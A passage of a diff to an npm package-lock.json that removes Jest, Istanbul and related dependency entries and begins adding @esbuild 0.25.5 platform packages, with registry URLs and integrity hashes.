"https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true - }, - "getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", - "requires": { - "assert-plus": "^1.0.0" - } - }, - "glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "requires": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - } - }, - "globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true - }, - "graceful-fs": { - "version": "4.2.11", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", - "dev": true - }, - "har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==" - }, - "har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "requires": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - } - }, - "has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "requires": { - "function-bind": "^1.1.1" - } - }, - "has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true - }, - "html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", - "requires": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - } - }, - "human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true - }, - "import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "requires": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - } - }, - "imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true - }, - "inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "requires": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "ip-address": { - "version": "8.1.0", - "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-8.1.0.tgz", - "integrity": "sha512-Wz91gZKpNKoXtqvY8ScarKYwhXoK4r/b5QuT+uywe/azv0/nUCo7Bh0IRRI7F9DHR06kJNWtzMGLIbXavngbKA==", - "requires": { - "jsbn": "1.1.0", - "sprintf-js": "1.1.2" - } - }, - "ip-regex": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ip-regex/-/ip-regex-4.3.0.tgz", - "integrity": "sha512-B9ZWJxHHOHUhUjCPrMpLD4xEq35bUTClHM1S6CBU5ixQnkZmwipwgc96vAd7AAGM9TGHvJR+Uss+/Ak6UphK+Q==" - }, - "is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "is-core-module": { - "version": "2.12.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.12.1.tgz", - "integrity": "sha512-Q4ZuBAe2FUsKtyQJoQHlvP8OvBERxO3jEmy1I7hcRXcJBGGHFh/aJBswbXuS9sgrDH2QUO8ilkwNPHvHMd8clg==", - "dev": true, - "requires": { - "has": "^1.0.3" - } - }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true - }, - "is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true - }, - "is-ip": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/is-ip/-/is-ip-3.1.0.tgz", - "integrity": "sha512-35vd5necO7IitFPjd/YBeqwWnyDWbuLH9ZXQdMfDA8TEo7pv5X8yfrvVO3xbJbLUlERCMvf6X0hTUamQxCYJ9Q==", - "requires": { - "ip-regex": "^4.0.0" - } - }, - "is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true - }, - "is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true - }, - "is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" - }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "requires": {} - }, - "isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" - }, - "istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true - }, - "istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "requires": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - } - }, - "istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "requires": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - } - }, - "istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "requires": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - } - }, - "istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "requires": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - } - }, - "jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.6.1.tgz", - "integrity": "sha512-Nirw5B4nn69rVUZtemCQhwxOBhm0nsp3hmtF4rzCeWD7BkjAXRIji7xWQfnTNbz9g0aVsBX6aZK3n+23LM6uDw==", - "dev": true, - "requires": { - "@jest/core": "^29.6.1", - "@jest/types": "^29.6.1", - "import-local": "^3.0.2", - "jest-cli": "^29.6.1" - } - }, - "jest-changed-files": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.5.0.tgz", - "integrity": "sha512-IFG34IUMUaNBIxjQXF/iu7g6EcdMrGRRxaUSw92I/2g2YC6vCdTltl4nHvt7Ci5nSJwXIkCu8Ka1DKF+X7Z1Ag==", - "dev": true, - "requires": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - } - }, - "jest-circus": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.6.1.tgz", - "integrity": "sha512-tPbYLEiBU4MYAL2XoZme/bgfUeotpDBd81lgHLCbDZZFaGmECk0b+/xejPFtmiBP87GgP/y4jplcRpbH+fgCzQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.6.1", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.6.1", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-cli": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.6.1.tgz", - "integrity": "sha512-607dSgTA4ODIN6go9w6xY3EYkyPFGicx51a69H7yfvt7lN53xNswEVLovq+E77VsTRi5fWprLH0yl4DJgE8Ing==", - "dev": true, - "requires": { - "@jest/core": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - } - }, - "jest-config": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.6.1.tgz", - "integrity": "sha512-XdjYV2fy2xYixUiV2Wc54t3Z4oxYPAELUzWnV6+mcbq0rh742X2p52pii5A3oeRzYjLnQxCsZmp0qpI6klE2cQ==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.6.1", - "@jest/types": "^29.6.1", - "babel-jest": "^29.6.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.6.1", - "jest-environment-node": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - } - }, - "jest-diff": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.6.1.tgz", - "integrity": "sha512-FsNCvinvl8oVxpNLttNQX7FAq7vR+gMDGj90tiP7siWw1UdakWUGqrylpsYrpvj908IYckm5Y0Q7azNAozU1Kg==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^29.4.3", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } - }, - "jest-docblock": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.4.3.tgz", - "integrity": "sha512-fzdTftThczeSD9nZ3fzA/4KkHtnmllawWrXO69vtI+L9WjEIuXWs4AmyME7lN5hU7dB0sHhuPfcKofRsUb/2Fg==", - "dev": true, - "requires": { - "detect-newline": "^3.0.0" - } - }, - "jest-each": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.6.1.tgz", - "integrity": "sha512-n5eoj5eiTHpKQCAVcNTT7DRqeUmJ01hsAL0Q1SMiBHcBcvTKDELixQOGMCpqhbIuTcfC4kMfSnpmDqRgRJcLNQ==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "jest-util": "^29.6.1", - "pretty-format": "^29.6.1" - } - }, - "jest-environment-node": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.6.1.tgz", - "integrity": "sha512-ZNIfAiE+foBog24W+2caIldl4Irh8Lx1PUhg/GZ0odM1d/h2qORAsejiFc7zb+SEmYPn1yDZzEDSU5PmDkmVLQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "jest-get-type": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.4.3.tgz", - "integrity": "sha512-J5Xez4nRRMjk8emnTpWrlkyb9pfRQQanDrvWHhsR1+VUfbwxi30eVcZFlcdGInRibU4G5LwHXpI7IRHU0CY+gg==", - "dev": true - }, - "jest-haste-map": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.6.1.tgz", - "integrity": "sha512-0m7f9PZXxOCk1gRACiVgX85knUKPKLPg4oRCjLoqIm9brTHXaorMA0JpmtmVkQiT8nmXyIVoZd/nnH1cfC33ig==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-leak-detector": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.6.1.tgz", - "integrity": "sha512-OrxMNyZirpOEwkF3UHnIkAiZbtkBWiye+hhBweCHkVbCgyEy71Mwbb5zgeTNYWJBi1qgDVfPC1IwO9dVEeTLwQ==", - "dev": true, - "requires": { - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } - }, - "jest-matcher-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.6.1.tgz", - "integrity": "sha512-SLaztw9d2mfQQKHmJXKM0HCbl2PPVld/t9Xa6P9sgiExijviSp7TnZZpw2Fpt+OI3nwUO/slJbOfzfUMKKC5QA==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } - }, - "jest-message-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.6.1.tgz", - "integrity": "sha512-KoAW2zAmNSd3Gk88uJ56qXUWbFk787QKmjjJVOjtGFmmGSZgDBrlIL4AfQw1xyMYPNVD7dNInfIbur9B2rd/wQ==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-mock": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.6.1.tgz", - "integrity": "sha512-brovyV9HBkjXAEdRooaTQK42n8usKoSRR3gihzUpYeV/vwqgSoNfrksO7UfSACnPmxasO/8TmHM3w9Hp3G1dgw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-util": "^29.6.1" - } - }, - "jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "requires": {} - }, - "jest-regex-util": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.4.3.tgz", - "integrity": "sha512-O4FglZaMmWXbGHSQInfXewIsd1LMn9p3ZXB/6r4FOkyhX2/iP/soMG98jGvk/A3HAN78+5VWcBGO0BJAPRh4kg==", - "dev": true - }, - "jest-resolve": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.6.1.tgz", - "integrity": "sha512-AeRkyS8g37UyJiP9w3mmI/VXU/q8l/IH52vj/cDAyScDcemRbSBhfX/NMYIGilQgSVwsjxrCHf3XJu4f+lxCMg==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - } - }, - "jest-resolve-dependencies": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.6.1.tgz", - "integrity": "sha512-BbFvxLXtcldaFOhNMXmHRWx1nXQO5LoXiKSGQcA1LxxirYceZT6ch8KTE1bK3X31TNG/JbkI7OkS/ABexVahiw==", - "dev": true, - "requires": { - "jest-regex-util": "^29.4.3", - "jest-snapshot": "^29.6.1" - } - }, - "jest-runner": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.6.1.tgz", - "integrity": "sha512-tw0wb2Q9yhjAQ2w8rHRDxteryyIck7gIzQE4Reu3JuOBpGp96xWgF0nY8MDdejzrLCZKDcp8JlZrBN/EtkQvPQ==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/environment": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.4.3", - "jest-environment-node": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-leak-detector": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-resolve": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-util": "^29.6.1", - "jest-watcher": "^29.6.1", - "jest-worker": "^29.6.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - } - }, - "jest-runtime": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.6.1.tgz", - "integrity": "sha512-D6/AYOA+Lhs5e5il8+5pSLemjtJezUr+8zx+Sn8xlmOux3XOqx4d8l/2udBea8CRPqqrzhsKUsN/gBDE/IcaPQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/globals": "^29.6.1", - "@jest/source-map": "^29.6.0", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - } - }, - "jest-snapshot": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.6.1.tgz", - "integrity": "sha512-G4UQE1QQ6OaCgfY+A0uR1W2AY0tGXUPQpoUClhWHq1Xdnx1H6JOrC2nH5lqnOEqaDgbHFgIwZ7bNq24HpB180A==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.6.1", - "semver": "^7.5.3" - }, - "dependencies": { - "lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "requires": { - "lru-cache": "^6.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - } - } - }, - "jest-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.6.1.tgz", - "integrity": "sha512-NRFCcjc+/uO3ijUVyNOQJluf8PtGCe/W6cix36+M3cTFgiYqFOOW5MgN4JOOcvbUhcKTYVd1CvHz/LWi8d16Mg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.6.1.tgz", - "integrity": "sha512-r3Ds69/0KCN4vx4sYAbGL1EVpZ7MSS0vLmd3gV78O+NAx3PDQQukRU5hNHPXlyqCgFY8XUk7EuTMLugh0KzahA==", + "@esbuild/android-x64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/android-x64/-/android-x64-0.25.5.tgz", + "integrity": "sha512-D2GyJT1kjvO//drbRT3Hib9XPwQeWd9vZoBJn+bu/lVsOZ13cqNdDeqIF/xQ5/VmWvMduP6AmXvylO/PIc2isw==", "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "leven": "^3.1.0", - "pretty-format": "^29.6.1" - }, - "dependencies": { - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true - } - } + "optional": true }, - "jest-watcher": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.6.1.tgz", - "integrity": "sha512-d4wpjWTS7HEZPaaj8m36QiaP856JthRZkrgcIY/7ISoUWPIillrXM23WPboZVLbiwZBt4/qn2Jke84Sla6JhFA==", + "@esbuild/darwin-arm64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-arm64/-/darwin-arm64-0.25.5.tgz", + "integrity": "sha512-GtaBgammVvdF7aPIgH2jxMDdivezgFu6iKpmT+48+F8Hhg5J/sfnDieg0aeG/jfSvkYQU2/pceFPDKlqZzwnfQ==", "dev": true, - "requires": { - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.6.1", - "string-length": "^4.0.1" - 